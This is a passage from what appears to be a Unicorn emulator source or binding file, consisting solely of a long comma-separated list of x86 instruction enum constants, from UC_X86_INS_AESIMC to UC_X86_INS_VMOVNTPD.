UC_X86_INS_AESIMC, UC_X86_INS_AESKEYGENASSIST, UC_X86_INS_AND, UC_X86_INS_ANDN, UC_X86_INS_ANDNPD, UC_X86_INS_ANDNPS, UC_X86_INS_ANDPD, UC_X86_INS_ANDPS, UC_X86_INS_ARPL, UC_X86_INS_BEXTR, UC_X86_INS_BLCFILL, UC_X86_INS_BLCI, UC_X86_INS_BLCIC, UC_X86_INS_BLCMSK, UC_X86_INS_BLCS, UC_X86_INS_BLENDPD, UC_X86_INS_BLENDPS, UC_X86_INS_BLENDVPD, UC_X86_INS_BLENDVPS, UC_X86_INS_BLSFILL, UC_X86_INS_BLSI, UC_X86_INS_BLSIC, UC_X86_INS_BLSMSK, UC_X86_INS_BLSR, UC_X86_INS_BOUND, UC_X86_INS_BSF, UC_X86_INS_BSR, UC_X86_INS_BSWAP, UC_X86_INS_BT, UC_X86_INS_BTC, UC_X86_INS_BTR, UC_X86_INS_BTS, UC_X86_INS_BZHI, UC_X86_INS_CALL, UC_X86_INS_CBW, UC_X86_INS_CDQ, UC_X86_INS_CDQE, UC_X86_INS_FCHS, UC_X86_INS_CLAC, UC_X86_INS_CLC, UC_X86_INS_CLD, UC_X86_INS_CLFLUSH, UC_X86_INS_CLFLUSHOPT, UC_X86_INS_CLGI, UC_X86_INS_CLI, UC_X86_INS_CLTS, UC_X86_INS_CLWB, UC_X86_INS_CMC, UC_X86_INS_CMOVA, UC_X86_INS_CMOVAE, UC_X86_INS_CMOVB, UC_X86_INS_CMOVBE, UC_X86_INS_FCMOVBE, UC_X86_INS_FCMOVB, UC_X86_INS_CMOVE, UC_X86_INS_FCMOVE, UC_X86_INS_CMOVG, UC_X86_INS_CMOVGE, UC_X86_INS_CMOVL, UC_X86_INS_CMOVLE, UC_X86_INS_FCMOVNBE, UC_X86_INS_FCMOVNB, UC_X86_INS_CMOVNE, UC_X86_INS_FCMOVNE, UC_X86_INS_CMOVNO, UC_X86_INS_CMOVNP, UC_X86_INS_FCMOVNU, UC_X86_INS_CMOVNS, UC_X86_INS_CMOVO, UC_X86_INS_CMOVP, UC_X86_INS_FCMOVU, UC_X86_INS_CMOVS, UC_X86_INS_CMP, UC_X86_INS_CMPPD, UC_X86_INS_CMPPS, UC_X86_INS_CMPSB, UC_X86_INS_CMPSD, UC_X86_INS_CMPSQ, UC_X86_INS_CMPSS, UC_X86_INS_CMPSW, UC_X86_INS_CMPXCHG16B, UC_X86_INS_CMPXCHG, UC_X86_INS_CMPXCHG8B, UC_X86_INS_COMISD, UC_X86_INS_COMISS, UC_X86_INS_FCOMP, UC_X86_INS_FCOMPI, UC_X86_INS_FCOMI, UC_X86_INS_FCOM, UC_X86_INS_FCOS, UC_X86_INS_CPUID, UC_X86_INS_CQO, UC_X86_INS_CRC32, UC_X86_INS_CVTDQ2PD, UC_X86_INS_CVTDQ2PS, UC_X86_INS_CVTPD2DQ, UC_X86_INS_CVTPD2PS, UC_X86_INS_CVTPS2DQ, UC_X86_INS_CVTPS2PD, UC_X86_INS_CVTSD2SI, UC_X86_INS_CVTSD2SS, UC_X86_INS_CVTSI2SD, UC_X86_INS_CVTSI2SS, UC_X86_INS_CVTSS2SD, UC_X86_INS_CVTSS2SI, UC_X86_INS_CVTTPD2DQ, UC_X86_INS_CVTTPS2DQ, UC_X86_INS_CVTTSD2SI, UC_X86_INS_CVTTSS2SI, UC_X86_INS_CWD, UC_X86_INS_CWDE, UC_X86_INS_DAA, UC_X86_INS_DAS, UC_X86_INS_DATA16, UC_X86_INS_DEC, UC_X86_INS_DIV, UC_X86_INS_DIVPD, UC_X86_INS_DIVPS, UC_X86_INS_FDIVR, UC_X86_INS_FIDIVR, UC_X86_INS_FDIVRP, UC_X86_INS_DIVSD, UC_X86_INS_DIVSS, UC_X86_INS_FDIV, UC_X86_INS_FIDIV, UC_X86_INS_FDIVP, UC_X86_INS_DPPD, UC_X86_INS_DPPS, UC_X86_INS_RET, UC_X86_INS_ENCLS, UC_X86_INS_ENCLU, UC_X86_INS_ENTER, UC_X86_INS_EXTRACTPS, UC_X86_INS_EXTRQ, UC_X86_INS_F2XM1, UC_X86_INS_LCALL, UC_X86_INS_LJMP, UC_X86_INS_FBLD, UC_X86_INS_FBSTP, UC_X86_INS_FCOMPP, UC_X86_INS_FDECSTP, UC_X86_INS_FEMMS, UC_X86_INS_FFREE, UC_X86_INS_FICOM, UC_X86_INS_FICOMP, UC_X86_INS_FINCSTP, UC_X86_INS_FLDCW, UC_X86_INS_FLDENV, UC_X86_INS_FLDL2E, UC_X86_INS_FLDL2T, UC_X86_INS_FLDLG2, UC_X86_INS_FLDLN2, UC_X86_INS_FLDPI, UC_X86_INS_FNCLEX, UC_X86_INS_FNINIT, UC_X86_INS_FNOP, UC_X86_INS_FNSTCW, UC_X86_INS_FNSTSW, UC_X86_INS_FPATAN, UC_X86_INS_FPREM, UC_X86_INS_FPREM1, UC_X86_INS_FPTAN, UC_X86_INS_FFREEP, UC_X86_INS_FRNDINT, UC_X86_INS_FRSTOR, UC_X86_INS_FNSAVE, UC_X86_INS_FSCALE, UC_X86_INS_FSETPM, UC_X86_INS_FSINCOS, UC_X86_INS_FNSTENV, UC_X86_INS_FXAM, UC_X86_INS_FXRSTOR, UC_X86_INS_FXRSTOR64, UC_X86_INS_FXSAVE, UC_X86_INS_FXSAVE64, UC_X86_INS_FXTRACT, UC_X86_INS_FYL2X, UC_X86_INS_FYL2XP1, UC_X86_INS_MOVAPD, UC_X86_INS_MOVAPS, UC_X86_INS_ORPD, UC_X86_INS_ORPS, UC_X86_INS_VMOVAPD, UC_X86_INS_VMOVAPS, UC_X86_INS_XORPD, UC_X86_INS_XORPS, UC_X86_INS_GETSEC, UC_X86_INS_HADDPD, UC_X86_INS_HADDPS, UC_X86_INS_HLT, UC_X86_INS_HSUBPD, UC_X86_INS_HSUBPS, UC_X86_INS_IDIV, UC_X86_INS_FILD, UC_X86_INS_IMUL, UC_X86_INS_IN, UC_X86_INS_INC, UC_X86_INS_INSB, UC_X86_INS_INSERTPS, UC_X86_INS_INSERTQ, UC_X86_INS_INSD, UC_X86_INS_INSW, UC_X86_INS_INT, UC_X86_INS_INT1, UC_X86_INS_INT3, UC_X86_INS_INTO, UC_X86_INS_INVD, UC_X86_INS_INVEPT, UC_X86_INS_INVLPG, UC_X86_INS_INVLPGA, UC_X86_INS_INVPCID, UC_X86_INS_INVVPID, UC_X86_INS_IRET, UC_X86_INS_IRETD, UC_X86_INS_IRETQ, UC_X86_INS_FISTTP, UC_X86_INS_FIST, UC_X86_INS_FISTP, UC_X86_INS_UCOMISD, UC_X86_INS_UCOMISS, UC_X86_INS_VCOMISD, UC_X86_INS_VCOMISS, UC_X86_INS_VCVTSD2SS, UC_X86_INS_VCVTSI2SD, UC_X86_INS_VCVTSI2SS, UC_X86_INS_VCVTSS2SD, UC_X86_INS_VCVTTSD2SI, UC_X86_INS_VCVTTSD2USI, UC_X86_INS_VCVTTSS2SI, UC_X86_INS_VCVTTSS2USI, UC_X86_INS_VCVTUSI2SD, UC_X86_INS_VCVTUSI2SS, UC_X86_INS_VUCOMISD, UC_X86_INS_VUCOMISS, UC_X86_INS_JAE, UC_X86_INS_JA, UC_X86_INS_JBE, UC_X86_INS_JB, UC_X86_INS_JCXZ, UC_X86_INS_JECXZ, UC_X86_INS_JE, UC_X86_INS_JGE, UC_X86_INS_JG, UC_X86_INS_JLE, UC_X86_INS_JL, UC_X86_INS_JMP, UC_X86_INS_JNE, UC_X86_INS_JNO, UC_X86_INS_JNP, UC_X86_INS_JNS, UC_X86_INS_JO, UC_X86_INS_JP, UC_X86_INS_JRCXZ, UC_X86_INS_JS, UC_X86_INS_KANDB, UC_X86_INS_KANDD, UC_X86_INS_KANDNB, UC_X86_INS_KANDND, UC_X86_INS_KANDNQ, UC_X86_INS_KANDNW, UC_X86_INS_KANDQ, UC_X86_INS_KANDW, UC_X86_INS_KMOVB, UC_X86_INS_KMOVD, UC_X86_INS_KMOVQ, UC_X86_INS_KMOVW, UC_X86_INS_KNOTB, UC_X86_INS_KNOTD, UC_X86_INS_KNOTQ, UC_X86_INS_KNOTW, UC_X86_INS_KORB, UC_X86_INS_KORD, UC_X86_INS_KORQ, UC_X86_INS_KORTESTB, UC_X86_INS_KORTESTD, UC_X86_INS_KORTESTQ, UC_X86_INS_KORTESTW, UC_X86_INS_KORW, UC_X86_INS_KSHIFTLB, UC_X86_INS_KSHIFTLD, UC_X86_INS_KSHIFTLQ, UC_X86_INS_KSHIFTLW, UC_X86_INS_KSHIFTRB, UC_X86_INS_KSHIFTRD, UC_X86_INS_KSHIFTRQ, UC_X86_INS_KSHIFTRW, UC_X86_INS_KUNPCKBW, UC_X86_INS_KXNORB, UC_X86_INS_KXNORD, UC_X86_INS_KXNORQ, UC_X86_INS_KXNORW, UC_X86_INS_KXORB, UC_X86_INS_KXORD, UC_X86_INS_KXORQ, UC_X86_INS_KXORW, UC_X86_INS_LAHF, UC_X86_INS_LAR, UC_X86_INS_LDDQU, UC_X86_INS_LDMXCSR, UC_X86_INS_LDS, UC_X86_INS_FLDZ, UC_X86_INS_FLD1, UC_X86_INS_FLD, UC_X86_INS_LEA, UC_X86_INS_LEAVE, UC_X86_INS_LES, UC_X86_INS_LFENCE, UC_X86_INS_LFS, UC_X86_INS_LGDT, UC_X86_INS_LGS, UC_X86_INS_LIDT, UC_X86_INS_LLDT, UC_X86_INS_LMSW, UC_X86_INS_OR, UC_X86_INS_SUB, UC_X86_INS_XOR, UC_X86_INS_LODSB, UC_X86_INS_LODSD, UC_X86_INS_LODSQ, UC_X86_INS_LODSW, UC_X86_INS_LOOP, UC_X86_INS_LOOPE, UC_X86_INS_LOOPNE, UC_X86_INS_RETF, UC_X86_INS_RETFQ, UC_X86_INS_LSL, UC_X86_INS_LSS, UC_X86_INS_LTR, UC_X86_INS_XADD, UC_X86_INS_LZCNT, UC_X86_INS_MASKMOVDQU, UC_X86_INS_MAXPD, UC_X86_INS_MAXPS, UC_X86_INS_MAXSD, UC_X86_INS_MAXSS, UC_X86_INS_MFENCE, UC_X86_INS_MINPD, UC_X86_INS_MINPS, UC_X86_INS_MINSD, UC_X86_INS_MINSS, UC_X86_INS_CVTPD2PI, UC_X86_INS_CVTPI2PD, UC_X86_INS_CVTPI2PS, UC_X86_INS_CVTPS2PI, UC_X86_INS_CVTTPD2PI, UC_X86_INS_CVTTPS2PI, UC_X86_INS_EMMS, UC_X86_INS_MASKMOVQ, UC_X86_INS_MOVD, UC_X86_INS_MOVDQ2Q, UC_X86_INS_MOVNTQ, UC_X86_INS_MOVQ2DQ, UC_X86_INS_MOVQ, UC_X86_INS_PABSB, UC_X86_INS_PABSD, UC_X86_INS_PABSW, UC_X86_INS_PACKSSDW, UC_X86_INS_PACKSSWB, UC_X86_INS_PACKUSWB, UC_X86_INS_PADDB, UC_X86_INS_PADDD, UC_X86_INS_PADDQ, UC_X86_INS_PADDSB, UC_X86_INS_PADDSW, UC_X86_INS_PADDUSB, UC_X86_INS_PADDUSW, UC_X86_INS_PADDW, UC_X86_INS_PALIGNR, UC_X86_INS_PANDN, UC_X86_INS_PAND, UC_X86_INS_PAVGB, UC_X86_INS_PAVGW, UC_X86_INS_PCMPEQB, UC_X86_INS_PCMPEQD, UC_X86_INS_PCMPEQW, UC_X86_INS_PCMPGTB, UC_X86_INS_PCMPGTD, UC_X86_INS_PCMPGTW, UC_X86_INS_PEXTRW, UC_X86_INS_PHADDSW, UC_X86_INS_PHADDW, UC_X86_INS_PHADDD, UC_X86_INS_PHSUBD, UC_X86_INS_PHSUBSW, UC_X86_INS_PHSUBW, UC_X86_INS_PINSRW, UC_X86_INS_PMADDUBSW, UC_X86_INS_PMADDWD, UC_X86_INS_PMAXSW, UC_X86_INS_PMAXUB, UC_X86_INS_PMINSW, UC_X86_INS_PMINUB, UC_X86_INS_PMOVMSKB, UC_X86_INS_PMULHRSW, UC_X86_INS_PMULHUW, UC_X86_INS_PMULHW, UC_X86_INS_PMULLW, UC_X86_INS_PMULUDQ, UC_X86_INS_POR, UC_X86_INS_PSADBW, UC_X86_INS_PSHUFB, UC_X86_INS_PSHUFW, UC_X86_INS_PSIGNB, UC_X86_INS_PSIGND, UC_X86_INS_PSIGNW, UC_X86_INS_PSLLD, UC_X86_INS_PSLLQ, UC_X86_INS_PSLLW, UC_X86_INS_PSRAD, UC_X86_INS_PSRAW, UC_X86_INS_PSRLD, UC_X86_INS_PSRLQ, UC_X86_INS_PSRLW, UC_X86_INS_PSUBB, UC_X86_INS_PSUBD, UC_X86_INS_PSUBQ, UC_X86_INS_PSUBSB, UC_X86_INS_PSUBSW, UC_X86_INS_PSUBUSB, UC_X86_INS_PSUBUSW, UC_X86_INS_PSUBW, UC_X86_INS_PUNPCKHBW, UC_X86_INS_PUNPCKHDQ, UC_X86_INS_PUNPCKHWD, UC_X86_INS_PUNPCKLBW, UC_X86_INS_PUNPCKLDQ, UC_X86_INS_PUNPCKLWD, UC_X86_INS_PXOR, UC_X86_INS_MONITOR, UC_X86_INS_MONTMUL, UC_X86_INS_MOV, UC_X86_INS_MOVABS, UC_X86_INS_MOVBE, UC_X86_INS_MOVDDUP, UC_X86_INS_MOVDQA, UC_X86_INS_MOVDQU, UC_X86_INS_MOVHLPS, UC_X86_INS_MOVHPD, UC_X86_INS_MOVHPS, UC_X86_INS_MOVLHPS, UC_X86_INS_MOVLPD, UC_X86_INS_MOVLPS, UC_X86_INS_MOVMSKPD, UC_X86_INS_MOVMSKPS, UC_X86_INS_MOVNTDQA, UC_X86_INS_MOVNTDQ, UC_X86_INS_MOVNTI, UC_X86_INS_MOVNTPD, UC_X86_INS_MOVNTPS, UC_X86_INS_MOVNTSD, UC_X86_INS_MOVNTSS, UC_X86_INS_MOVSB, UC_X86_INS_MOVSD, UC_X86_INS_MOVSHDUP, UC_X86_INS_MOVSLDUP, UC_X86_INS_MOVSQ, UC_X86_INS_MOVSS, UC_X86_INS_MOVSW, UC_X86_INS_MOVSX, UC_X86_INS_MOVSXD, UC_X86_INS_MOVUPD, UC_X86_INS_MOVUPS, UC_X86_INS_MOVZX, UC_X86_INS_MPSADBW, UC_X86_INS_MUL, UC_X86_INS_MULPD, UC_X86_INS_MULPS, UC_X86_INS_MULSD, UC_X86_INS_MULSS, UC_X86_INS_MULX, UC_X86_INS_FMUL, UC_X86_INS_FIMUL, UC_X86_INS_FMULP, UC_X86_INS_MWAIT, UC_X86_INS_NEG, UC_X86_INS_NOP, UC_X86_INS_NOT, UC_X86_INS_OUT, UC_X86_INS_OUTSB, UC_X86_INS_OUTSD, UC_X86_INS_OUTSW, UC_X86_INS_PACKUSDW, UC_X86_INS_PAUSE, UC_X86_INS_PAVGUSB, UC_X86_INS_PBLENDVB, UC_X86_INS_PBLENDW, UC_X86_INS_PCLMULQDQ, UC_X86_INS_PCMPEQQ, UC_X86_INS_PCMPESTRI, UC_X86_INS_PCMPESTRM, UC_X86_INS_PCMPGTQ, UC_X86_INS_PCMPISTRI, UC_X86_INS_PCMPISTRM, UC_X86_INS_PCOMMIT, UC_X86_INS_PDEP, UC_X86_INS_PEXT, UC_X86_INS_PEXTRB, UC_X86_INS_PEXTRD, UC_X86_INS_PEXTRQ, UC_X86_INS_PF2ID, UC_X86_INS_PF2IW, UC_X86_INS_PFACC, UC_X86_INS_PFADD, UC_X86_INS_PFCMPEQ, UC_X86_INS_PFCMPGE, UC_X86_INS_PFCMPGT, UC_X86_INS_PFMAX, UC_X86_INS_PFMIN, UC_X86_INS_PFMUL, UC_X86_INS_PFNACC, UC_X86_INS_PFPNACC, UC_X86_INS_PFRCPIT1, UC_X86_INS_PFRCPIT2, UC_X86_INS_PFRCP, UC_X86_INS_PFRSQIT1, UC_X86_INS_PFRSQRT, UC_X86_INS_PFSUBR, UC_X86_INS_PFSUB, UC_X86_INS_PHMINPOSUW, UC_X86_INS_PI2FD, UC_X86_INS_PI2FW, UC_X86_INS_PINSRB, UC_X86_INS_PINSRD, UC_X86_INS_PINSRQ, UC_X86_INS_PMAXSB, UC_X86_INS_PMAXSD, UC_X86_INS_PMAXUD, UC_X86_INS_PMAXUW, UC_X86_INS_PMINSB, UC_X86_INS_PMINSD, UC_X86_INS_PMINUD, UC_X86_INS_PMINUW, UC_X86_INS_PMOVSXBD, UC_X86_INS_PMOVSXBQ, UC_X86_INS_PMOVSXBW, UC_X86_INS_PMOVSXDQ, UC_X86_INS_PMOVSXWD, UC_X86_INS_PMOVSXWQ, UC_X86_INS_PMOVZXBD, UC_X86_INS_PMOVZXBQ, UC_X86_INS_PMOVZXBW, UC_X86_INS_PMOVZXDQ, UC_X86_INS_PMOVZXWD, UC_X86_INS_PMOVZXWQ, UC_X86_INS_PMULDQ, UC_X86_INS_PMULHRW, UC_X86_INS_PMULLD, UC_X86_INS_POP, UC_X86_INS_POPAW, UC_X86_INS_POPAL, UC_X86_INS_POPCNT, UC_X86_INS_POPF, UC_X86_INS_POPFD, UC_X86_INS_POPFQ, UC_X86_INS_PREFETCH, UC_X86_INS_PREFETCHNTA, UC_X86_INS_PREFETCHT0, UC_X86_INS_PREFETCHT1, UC_X86_INS_PREFETCHT2, UC_X86_INS_PREFETCHW, UC_X86_INS_PSHUFD, UC_X86_INS_PSHUFHW, UC_X86_INS_PSHUFLW, UC_X86_INS_PSLLDQ, UC_X86_INS_PSRLDQ, UC_X86_INS_PSWAPD, UC_X86_INS_PTEST, UC_X86_INS_PUNPCKHQDQ, UC_X86_INS_PUNPCKLQDQ, UC_X86_INS_PUSH, UC_X86_INS_PUSHAW, UC_X86_INS_PUSHAL, UC_X86_INS_PUSHF, UC_X86_INS_PUSHFD, UC_X86_INS_PUSHFQ, UC_X86_INS_RCL, UC_X86_INS_RCPPS, UC_X86_INS_RCPSS, UC_X86_INS_RCR, UC_X86_INS_RDFSBASE, UC_X86_INS_RDGSBASE, UC_X86_INS_RDMSR, UC_X86_INS_RDPMC, UC_X86_INS_RDRAND, UC_X86_INS_RDSEED, UC_X86_INS_RDTSC, UC_X86_INS_RDTSCP, UC_X86_INS_ROL, UC_X86_INS_ROR, UC_X86_INS_RORX, UC_X86_INS_ROUNDPD, UC_X86_INS_ROUNDPS, UC_X86_INS_ROUNDSD, UC_X86_INS_ROUNDSS, UC_X86_INS_RSM, UC_X86_INS_RSQRTPS, UC_X86_INS_RSQRTSS, UC_X86_INS_SAHF, UC_X86_INS_SAL, UC_X86_INS_SALC, UC_X86_INS_SAR, UC_X86_INS_SARX, UC_X86_INS_SBB, UC_X86_INS_SCASB, UC_X86_INS_SCASD, UC_X86_INS_SCASQ, UC_X86_INS_SCASW, UC_X86_INS_SETAE, UC_X86_INS_SETA, UC_X86_INS_SETBE, UC_X86_INS_SETB, UC_X86_INS_SETE, UC_X86_INS_SETGE, UC_X86_INS_SETG, UC_X86_INS_SETLE, UC_X86_INS_SETL, UC_X86_INS_SETNE, UC_X86_INS_SETNO, UC_X86_INS_SETNP, UC_X86_INS_SETNS, UC_X86_INS_SETO, UC_X86_INS_SETP, UC_X86_INS_SETS, UC_X86_INS_SFENCE, UC_X86_INS_SGDT, UC_X86_INS_SHA1MSG1, UC_X86_INS_SHA1MSG2, UC_X86_INS_SHA1NEXTE, UC_X86_INS_SHA1RNDS4, UC_X86_INS_SHA256MSG1, UC_X86_INS_SHA256MSG2, UC_X86_INS_SHA256RNDS2, UC_X86_INS_SHL, UC_X86_INS_SHLD, UC_X86_INS_SHLX, UC_X86_INS_SHR, UC_X86_INS_SHRD, UC_X86_INS_SHRX, UC_X86_INS_SHUFPD, UC_X86_INS_SHUFPS, UC_X86_INS_SIDT, UC_X86_INS_FSIN, UC_X86_INS_SKINIT, UC_X86_INS_SLDT, UC_X86_INS_SMSW, UC_X86_INS_SQRTPD, UC_X86_INS_SQRTPS, UC_X86_INS_SQRTSD, UC_X86_INS_SQRTSS, UC_X86_INS_FSQRT, UC_X86_INS_STAC, UC_X86_INS_STC, UC_X86_INS_STD, UC_X86_INS_STGI, UC_X86_INS_STI, UC_X86_INS_STMXCSR, UC_X86_INS_STOSB, UC_X86_INS_STOSD, UC_X86_INS_STOSQ, UC_X86_INS_STOSW, UC_X86_INS_STR, UC_X86_INS_FST, UC_X86_INS_FSTP, UC_X86_INS_FSTPNCE, UC_X86_INS_FXCH, UC_X86_INS_SUBPD, UC_X86_INS_SUBPS, UC_X86_INS_FSUBR, UC_X86_INS_FISUBR, UC_X86_INS_FSUBRP, UC_X86_INS_SUBSD, UC_X86_INS_SUBSS, UC_X86_INS_FSUB, UC_X86_INS_FISUB, UC_X86_INS_FSUBP, UC_X86_INS_SWAPGS, UC_X86_INS_SYSCALL, UC_X86_INS_SYSENTER, UC_X86_INS_SYSEXIT, UC_X86_INS_SYSRET, UC_X86_INS_T1MSKC, UC_X86_INS_TEST, UC_X86_INS_UD2, UC_X86_INS_FTST, UC_X86_INS_TZCNT, UC_X86_INS_TZMSK, UC_X86_INS_FUCOMPI, UC_X86_INS_FUCOMI, UC_X86_INS_FUCOMPP, UC_X86_INS_FUCOMP, UC_X86_INS_FUCOM, UC_X86_INS_UD2B, UC_X86_INS_UNPCKHPD, UC_X86_INS_UNPCKHPS, UC_X86_INS_UNPCKLPD, UC_X86_INS_UNPCKLPS, UC_X86_INS_VADDPD, UC_X86_INS_VADDPS, UC_X86_INS_VADDSD, UC_X86_INS_VADDSS, UC_X86_INS_VADDSUBPD, UC_X86_INS_VADDSUBPS, UC_X86_INS_VAESDECLAST, UC_X86_INS_VAESDEC, UC_X86_INS_VAESENCLAST, UC_X86_INS_VAESENC, UC_X86_INS_VAESIMC, UC_X86_INS_VAESKEYGENASSIST, UC_X86_INS_VALIGND, UC_X86_INS_VALIGNQ, UC_X86_INS_VANDNPD, UC_X86_INS_VANDNPS, UC_X86_INS_VANDPD, UC_X86_INS_VANDPS, UC_X86_INS_VBLENDMPD, UC_X86_INS_VBLENDMPS, UC_X86_INS_VBLENDPD, UC_X86_INS_VBLENDPS, UC_X86_INS_VBLENDVPD, UC_X86_INS_VBLENDVPS, UC_X86_INS_VBROADCASTF128, UC_X86_INS_VBROADCASTI32X4, UC_X86_INS_VBROADCASTI64X4, UC_X86_INS_VBROADCASTSD, UC_X86_INS_VBROADCASTSS, UC_X86_INS_VCMPPD, UC_X86_INS_VCMPPS, UC_X86_INS_VCMPSD, UC_X86_INS_VCMPSS, UC_X86_INS_VCOMPRESSPD, UC_X86_INS_VCOMPRESSPS, UC_X86_INS_VCVTDQ2PD, UC_X86_INS_VCVTDQ2PS, UC_X86_INS_VCVTPD2DQX, UC_X86_INS_VCVTPD2DQ, UC_X86_INS_VCVTPD2PSX, UC_X86_INS_VCVTPD2PS, UC_X86_INS_VCVTPD2UDQ, UC_X86_INS_VCVTPH2PS, UC_X86_INS_VCVTPS2DQ, UC_X86_INS_VCVTPS2PD, UC_X86_INS_VCVTPS2PH, UC_X86_INS_VCVTPS2UDQ, UC_X86_INS_VCVTSD2SI, UC_X86_INS_VCVTSD2USI, UC_X86_INS_VCVTSS2SI, UC_X86_INS_VCVTSS2USI, UC_X86_INS_VCVTTPD2DQX, UC_X86_INS_VCVTTPD2DQ, UC_X86_INS_VCVTTPD2UDQ, UC_X86_INS_VCVTTPS2DQ, UC_X86_INS_VCVTTPS2UDQ, UC_X86_INS_VCVTUDQ2PD, UC_X86_INS_VCVTUDQ2PS, UC_X86_INS_VDIVPD, UC_X86_INS_VDIVPS, UC_X86_INS_VDIVSD, UC_X86_INS_VDIVSS, UC_X86_INS_VDPPD, UC_X86_INS_VDPPS, UC_X86_INS_VERR, UC_X86_INS_VERW, UC_X86_INS_VEXP2PD, UC_X86_INS_VEXP2PS, UC_X86_INS_VEXPANDPD, UC_X86_INS_VEXPANDPS, UC_X86_INS_VEXTRACTF128, UC_X86_INS_VEXTRACTF32X4, UC_X86_INS_VEXTRACTF64X4, UC_X86_INS_VEXTRACTI128, UC_X86_INS_VEXTRACTI32X4, UC_X86_INS_VEXTRACTI64X4, UC_X86_INS_VEXTRACTPS, UC_X86_INS_VFMADD132PD, UC_X86_INS_VFMADD132PS, UC_X86_INS_VFMADDPD, UC_X86_INS_VFMADD213PD, UC_X86_INS_VFMADD231PD, UC_X86_INS_VFMADDPS, UC_X86_INS_VFMADD213PS, UC_X86_INS_VFMADD231PS, UC_X86_INS_VFMADDSD, UC_X86_INS_VFMADD213SD, UC_X86_INS_VFMADD132SD, UC_X86_INS_VFMADD231SD, UC_X86_INS_VFMADDSS, UC_X86_INS_VFMADD213SS, UC_X86_INS_VFMADD132SS, UC_X86_INS_VFMADD231SS, UC_X86_INS_VFMADDSUB132PD, UC_X86_INS_VFMADDSUB132PS, UC_X86_INS_VFMADDSUBPD, UC_X86_INS_VFMADDSUB213PD, UC_X86_INS_VFMADDSUB231PD, UC_X86_INS_VFMADDSUBPS, UC_X86_INS_VFMADDSUB213PS, UC_X86_INS_VFMADDSUB231PS, UC_X86_INS_VFMSUB132PD, UC_X86_INS_VFMSUB132PS, UC_X86_INS_VFMSUBADD132PD, UC_X86_INS_VFMSUBADD132PS, UC_X86_INS_VFMSUBADDPD, UC_X86_INS_VFMSUBADD213PD, UC_X86_INS_VFMSUBADD231PD, UC_X86_INS_VFMSUBADDPS, UC_X86_INS_VFMSUBADD213PS, UC_X86_INS_VFMSUBADD231PS, UC_X86_INS_VFMSUBPD, UC_X86_INS_VFMSUB213PD, UC_X86_INS_VFMSUB231PD, UC_X86_INS_VFMSUBPS, UC_X86_INS_VFMSUB213PS, UC_X86_INS_VFMSUB231PS, UC_X86_INS_VFMSUBSD, UC_X86_INS_VFMSUB213SD, UC_X86_INS_VFMSUB132SD, UC_X86_INS_VFMSUB231SD, UC_X86_INS_VFMSUBSS, UC_X86_INS_VFMSUB213SS, UC_X86_INS_VFMSUB132SS, UC_X86_INS_VFMSUB231SS, UC_X86_INS_VFNMADD132PD, UC_X86_INS_VFNMADD132PS, UC_X86_INS_VFNMADDPD, UC_X86_INS_VFNMADD213PD, UC_X86_INS_VFNMADD231PD, UC_X86_INS_VFNMADDPS, UC_X86_INS_VFNMADD213PS, UC_X86_INS_VFNMADD231PS, UC_X86_INS_VFNMADDSD, UC_X86_INS_VFNMADD213SD, UC_X86_INS_VFNMADD132SD, UC_X86_INS_VFNMADD231SD, UC_X86_INS_VFNMADDSS, UC_X86_INS_VFNMADD213SS, UC_X86_INS_VFNMADD132SS, UC_X86_INS_VFNMADD231SS, UC_X86_INS_VFNMSUB132PD, UC_X86_INS_VFNMSUB132PS, UC_X86_INS_VFNMSUBPD, UC_X86_INS_VFNMSUB213PD, UC_X86_INS_VFNMSUB231PD, UC_X86_INS_VFNMSUBPS, UC_X86_INS_VFNMSUB213PS, UC_X86_INS_VFNMSUB231PS, UC_X86_INS_VFNMSUBSD, UC_X86_INS_VFNMSUB213SD, UC_X86_INS_VFNMSUB132SD, UC_X86_INS_VFNMSUB231SD, UC_X86_INS_VFNMSUBSS, UC_X86_INS_VFNMSUB213SS, UC_X86_INS_VFNMSUB132SS, UC_X86_INS_VFNMSUB231SS, UC_X86_INS_VFRCZPD, UC_X86_INS_VFRCZPS, UC_X86_INS_VFRCZSD, UC_X86_INS_VFRCZSS, UC_X86_INS_VORPD, UC_X86_INS_VORPS, UC_X86_INS_VXORPD, UC_X86_INS_VXORPS, UC_X86_INS_VGATHERDPD, UC_X86_INS_VGATHERDPS, UC_X86_INS_VGATHERPF0DPD, UC_X86_INS_VGATHERPF0DPS, UC_X86_INS_VGATHERPF0QPD, UC_X86_INS_VGATHERPF0QPS, UC_X86_INS_VGATHERPF1DPD, UC_X86_INS_VGATHERPF1DPS, UC_X86_INS_VGATHERPF1QPD, UC_X86_INS_VGATHERPF1QPS, UC_X86_INS_VGATHERQPD, UC_X86_INS_VGATHERQPS, UC_X86_INS_VHADDPD, UC_X86_INS_VHADDPS, UC_X86_INS_VHSUBPD, UC_X86_INS_VHSUBPS, UC_X86_INS_VINSERTF128, UC_X86_INS_VINSERTF32X4, UC_X86_INS_VINSERTF32X8, UC_X86_INS_VINSERTF64X2, UC_X86_INS_VINSERTF64X4, UC_X86_INS_VINSERTI128, UC_X86_INS_VINSERTI32X4, UC_X86_INS_VINSERTI32X8, UC_X86_INS_VINSERTI64X2, UC_X86_INS_VINSERTI64X4, UC_X86_INS_VINSERTPS, UC_X86_INS_VLDDQU, UC_X86_INS_VLDMXCSR, UC_X86_INS_VMASKMOVDQU, UC_X86_INS_VMASKMOVPD, UC_X86_INS_VMASKMOVPS, UC_X86_INS_VMAXPD, UC_X86_INS_VMAXPS, UC_X86_INS_VMAXSD, UC_X86_INS_VMAXSS, UC_X86_INS_VMCALL, UC_X86_INS_VMCLEAR, UC_X86_INS_VMFUNC, UC_X86_INS_VMINPD, UC_X86_INS_VMINPS, UC_X86_INS_VMINSD, UC_X86_INS_VMINSS, UC_X86_INS_VMLAUNCH, UC_X86_INS_VMLOAD, UC_X86_INS_VMMCALL, UC_X86_INS_VMOVQ, UC_X86_INS_VMOVDDUP, UC_X86_INS_VMOVD, UC_X86_INS_VMOVDQA32, UC_X86_INS_VMOVDQA64, UC_X86_INS_VMOVDQA, UC_X86_INS_VMOVDQU16, UC_X86_INS_VMOVDQU32, UC_X86_INS_VMOVDQU64, UC_X86_INS_VMOVDQU8, UC_X86_INS_VMOVDQU, UC_X86_INS_VMOVHLPS, UC_X86_INS_VMOVHPD, UC_X86_INS_VMOVHPS, UC_X86_INS_VMOVLHPS, UC_X86_INS_VMOVLPD, UC_X86_INS_VMOVLPS, UC_X86_INS_VMOVMSKPD, UC_X86_INS_VMOVMSKPS, UC_X86_INS_VMOVNTDQA, UC_X86_INS_VMOVNTDQ, UC_X86_INS_VMOVNTPD, 